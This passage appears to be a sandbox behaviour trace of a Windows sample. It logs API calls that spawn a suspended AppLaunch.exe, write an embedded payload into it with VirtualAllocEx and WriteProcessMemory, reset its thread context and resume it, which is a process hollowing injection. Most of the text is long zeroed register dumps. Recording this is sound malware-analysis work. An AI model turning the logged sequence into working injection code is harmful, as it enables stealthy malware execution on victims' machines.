(HeapHandle=0x230000, Flags=0x8, Size=0x6) returned 0x24cc50 [0160.192] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x8, Size=0x5) returned 0x24cc60 [0160.192] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x8, Size=0x4) returned 0x24e000 [0160.192] GetLastError () returned 0x57 [0160.193] SetLastError (dwErrCode=0x57) [0160.193] GetLastError () returned 0x57 [0160.193] SetLastError (dwErrCode=0x57) [0160.193] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x8, Size=0xb8) returned 0x24e3e8 [0160.193] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x0, Size=0x6a6) returned 0x24e4a8 [0160.193] HeapFree (in: hHeap=0x230000, dwFlags=0x0, lpMem=0x24e4a8 | out: hHeap=0x230000) returned 1 [0160.193] HeapFree (in: hHeap=0x230000, dwFlags=0x0, lpMem=0x24abd8 | out: hHeap=0x230000) returned 1 [0160.193] HeapFree (in: hHeap=0x230000, dwFlags=0x0, lpMem=0x24cd10 | out: hHeap=0x230000) returned 1 [0160.193] HeapFree (in: hHeap=0x230000, dwFlags=0x0, lpMem=0x24e000 | out: hHeap=0x230000) returned 1 [0160.193] GetLastError () returned 0x57 [0160.194] SetLastError (dwErrCode=0x57) [0160.194] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x0, Size=0x6) returned 0x24e000 [0160.194] HeapFree (in: hHeap=0x230000, dwFlags=0x0, lpMem=0x24ac28 | out: hHeap=0x230000) returned 1 [0160.194] HeapFree (in: hHeap=0x230000, dwFlags=0x0, lpMem=0x24ac18 | out: hHeap=0x230000) returned 1 [0160.194] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x0, Size=0x8) returned 0x24e010 [0160.194] GetLastError () returned 0x57 [0160.194] GetProcAddress (hModule=0x769b0000, lpProcName="FlsGetValue") returned 0x769c1252 [0160.195] SetLastError (dwErrCode=0x57) [0160.195] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x769b0000 [0160.195] GetProcAddress (hModule=0x769b0000, lpProcName="VirtualProtect") returned 0x769c4317 [0160.195] VirtualProtect (in: lpAddress=0x18f784, dwSize=0x77e, flNewProtect=0x40, lpflOldProtect=0xa9cb4 | out: lpflOldProtect=0xa9cb4*=0x4) returned 1 [0160.550] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0160.550] FindResourceW (hModule=0x400000, lpName=0x65, lpType=0xa) returned 0x92d080 [0160.554] LoadResource (hModule=0x400000, hResInfo=0x92d080) returned 0x92d0a0 [0160.582] LockResource (hResData=0x92d0a0) returned 0x92d0a0 [0160.582] SizeofResource (hModule=0x400000, hResInfo=0x92d080) returned 0x1a000 [0160.584] CreateProcessW (in: lpApplicationName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\AppLaunch.exe", lpCommandLine=0x0, lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x4, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0xa9b60*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0xa9c9c | out: lpCommandLine=0x0, lpProcessInformation=0xa9c9c*(hProcess=0xac, hThread=0xa8, dwProcessId=0xf1c, dwThreadId=0xf20)) returned 1 [0160.653] GetThreadContext (in: hThread=0xa8, lpContext=0xa9894 | out: lpContext=0xa9894*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x2b, SegFs=0x53, SegEs=0x2b, SegDs=0x2b, Edi=0x0, Esi=0x0, Ebx=0xfffde000, Edx=0x0, Ecx=0x0, Eax=0x10cfb00, Ebp=0x0, Eip=0x779f01c4, SegCs=0x23, EFlags=0x202, Esp=0x38fdc8, SegSs=0x2b, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 1 [0161.026] ReadProcessMemory (in: hProcess=0xac, lpBaseAddress=0xfffde008, lpBuffer=0xa9c84, nSize=0x4, lpNumberOfBytesRead=0x0 | out: lpBuffer=0xa9c84*, lpNumberOfBytesRead=0x0) returned 1 [0161.026] VirtualAlloc (lpAddress=0x0, dwSize=0x20000, flAllocationType=0x3000, flProtect=0x40) returned 0x3600000 [0161.028] VirtualAllocEx (hProcess=0xac, lpAddress=0x400000, dwSize=0x20000, flAllocationType=0x3000, flProtect=0x40) returned 0x400000 [0161.031] WriteProcessMemory (in: hProcess=0xac, lpBaseAddress=0x400000, lpBuffer=0x3600000*, nSize=0x20000, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x3600000*, lpNumberOfBytesWritten=0x0) returned 1 [0161.040] VirtualProtectEx (in: hProcess=0xac, lpAddress=0x400000, dwSize=0x400, flNewProtect=0x2, lpflOldProtect=0xa9c20 | out: lpflOldProtect=0xa9c20*=0x40) returned 1 [0161.054] VirtualProtectEx (in: hProcess=0xac, lpAddress=0x402000, dwSize=0x18d7c, flNewProtect=0x20, lpflOldProtect=0xa9c20 | out: lpflOldProtect=0xa9c20*=0x40) returned 1 [0161.057] VirtualProtectEx (in: hProcess=0xac, lpAddress=0x41c000, dwSize=0x4d4, flNewProtect=0x2, lpflOldProtect=0xa9c20 | out: lpflOldProtect=0xa9c20*=0x40) returned 1 [0161.057] VirtualProtectEx (in: hProcess=0xac, lpAddress=0x41e000, dwSize=0xc, flNewProtect=0x2, lpflOldProtect=0xa9c20 | out: lpflOldProtect=0xa9c20*=0x40) returned 1 [0161.058] VirtualFree (lpAddress=0x3600000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0161.063] WriteProcessMemory (in: hProcess=0xac, lpBaseAddress=0xfffde008, lpBuffer=0xa9cb4*, nSize=0x4, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0xa9cb4*, lpNumberOfBytesWritten=0x0) returned 1 [0161.064] SetThreadContext (hThread=0xa8, lpContext=0xa9894*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x2b, SegFs=0x53, SegEs=0x2b, SegDs=0x2b, Edi=0x0, Esi=0x0, Ebx=0xfffde000, Edx=0x0, Ecx=0x0, Eax=0x4191a6, Ebp=0x0, Eip=0x779f01c4, SegCs=0x23, EFlags=0x202, Esp=0x38fdc8, SegSs=0x2b, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 1 [0161.065] ResumeThread (hThread=0xa8) returned 0x1 [0161.342] CloseHandle (hObject=0xac) returned 1 [0161.342] CloseHandle (hObject=0xa8) returned 1 [0161.342] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0161.343] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0161.368] HeapFree (in: hHeap=0x230000, dwFlags=0x0, lpMem=0x24ac38 | out: hHeap=0x230000) returned 1 [0161.368] HeapFree (in: hHeap=0x230000, dwFlags=0x0, lpMem=0x24cc50 | out: hHeap=0x230000) returned 1 [0161.368] HeapFree (in: hHeap=0x230000, dwFlags=0x0, lpMem=0x24cc60 | out: hHeap=0x230000) returned 1 [0161.368] HeapFree (in: hHeap=0x230000, dwFlags=0x0, lpMem=0x24bca0 | out: hHeap=0x230000) returned 1 [0161.368] HeapFree (in: hHeap=0x230000, dwFlags=0x0, lpMem=0x24e010 | out: hHeap=0x230000) returned 1 [0161.368] HeapFree (in: hHeap=0x230000, dwFlags=0x0, lpMem=0x24abf8 | out: hHeap=0x230000) returned 1 [0161.368] HeapFree (in: hHeap=0x230000, dwFlags=0x0, lpMem=0x24ac08 | out: hHeap=0x230000) returned 1 [0161.368] HeapFree (in: hHeap=0x230000, dwFlags=0x0, lpMem=0x24cdd0 | out: hHeap=0x230000) returned 1 [0161.368] HeapFree (in: hHeap=0x230000, dwFlags=0x0, lpMem=0x24bc80 | out: hHeap=0x230000) returned 1 [0161.368] HeapFree (in: hHeap=0x230000, dwFlags=0x0, lpMem=0x24abe8 | out: hHeap=0x230000) returned 1 [0162.121] HeapFree (in: hHeap=0x230000, dwFlags=0x0, lpMem=0x2462a8 | out: hHeap=0x230000) returned 1 [0162.121] HeapFree (in: hHeap=0x230000, dwFlags=0x0, lpMem=0x248140 | out: hHeap=0x230000) returned 1 [0162.121] HeapFree (in: hHeap=0x230000, dwFlags=0x0, lpMem=0x24a468 | out: hHeap=0x230000) returned 1 [0162.121] HeapFree (in: hHeap=0x230000, dwFlags=0x0, lpMem=0x244600 | out: hHeap=0x230000) returned 1 [0162.122] HeapFree (in: hHeap=0x230000, dwFlags=0x0, lpMem=0x246220 | out: hHeap=0x230000) returned 1 [0162.189] GetLastError () returned 0x57 [0162.189] SetLastError (dwErrCode=0x57) [0162.189] GetLastError () returned 0x57 [0162.189] SetLastError (dwErrCode=0x57) [0162.190] HeapFree (in: hHeap=0x230000, dwFlags=0x0, lpMem=0x24cfd8 | out: hHeap=0x230000) returned 1 [0162.190] HeapFree (in: hHeap=0x230000, dwFlags=0x0, lpMem=0x24c448 | out: hHeap=0x230000) returned 1 [0162.190] LoadLibraryExW (lpLibFileName="api-ms-win-appmodel-runtime-l1-1-2", hFile=0x0, dwFlags=0x800) returned 0x0 [0162.191] GetLastError () returned 0x7e [0162.191] GetModuleHandleExW (in: dwFlags=0x0, lpModuleName="mscoree.dll", phModule=0x18ff00 | out: phModule=0x18ff00) returned 0 [0162.191] ExitProcess (uExitCode=0x0) [0162.193] HeapFree (in: hHeap=0x230000, dwFlags=0x0, lpMem=0x24e000 | out: hHeap=0x230000) returned 1 [0162.193] HeapFree (in: hHeap=0x230000, dwFlags=0x0, lpMem=0x24e3e8 | out: hHeap=0x230000) returned 1 [0162.193] HeapFree (in: hHeap=0x230000, dwFlags=0x0, lpMem=0x2481d0 | out: hHeap=0x230000) returned 1 Process: id = "8" image_name = "applaunch.exe" filename = "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\applaunch.exe" page_root = "0xcbd4000" os_pid = "0xf1c" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "7" os_parent_pid = "0xeec" cmd_line = 